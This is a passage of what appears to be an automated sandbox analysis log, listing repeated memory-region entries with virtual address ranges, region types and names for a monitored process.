= 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6295 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6296 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6297 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6298 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6299 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6300 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6301 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6302 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6303 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6304 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6305 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6306 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6307 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6308 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6309 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6310 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6311 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6312 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6313 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6314 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6315 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6316 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6317 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6318 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6319 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6320 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6321 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6322 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6323 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6324 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6325 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6326 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6327 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6328 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6329 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6330 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6331 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6332 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6333 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6334 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6335 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6336 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6337 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6338 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6339 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6340 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6341 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6342 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6343 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6344 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6345 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6346 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6347 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6348 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6349 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6350 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6351 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6352 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6353 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6354 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6355 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6356 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6357 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6358 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6359 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6360 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6361 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6362 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6363 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6364 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6365 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6366 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6367 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6368 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6369 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6370 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6371 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6372 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6373 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6374 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6375 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6376 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6377 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6378 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6379 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6380 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6381 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6382 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6383 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6384 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6385 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6386 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6387 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6388 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6389 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6390 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6391 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6392 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6393 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6394 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6395 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6396 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6397 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6398 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6399 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6400 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6401 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6402 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6403 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6404 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6405 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6406 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6407 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6408 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6409 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6410 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6411 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6412 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6413 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6414 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6415 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6416 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6417 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6418 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6419 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6420 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6421 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6422 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6423 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6424 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6425 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6426 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6427 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6428 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6429 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6430 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6431 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6432 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6433 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6434 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6435 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6436 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6437 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6438 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6439 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6440 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6441 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6442 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6443 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6444 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6445 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6446 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6447 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6448 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6449 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6450 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6451 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6452 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6453 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6454 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6455 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6456 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6457 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6458 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6459 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6460 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6461 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6462 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6463 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6464 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6465 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6466 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6467 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6468 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6469 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6470 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6471 start_va = 0x460000 end_va = 0x460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6472 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6473 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6474 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6475 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6476 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6477 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6478 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6479 start_va = 0x90d0000 end_va = 0x91c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000090d0000" filename = "" Region: id = 6480 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6481 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6482 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6483 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6484 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6485 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6486 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6487 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 6488 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6489 start_va = 0x2900000 end_va = 0x291dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 6490 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6491 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 6492 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = 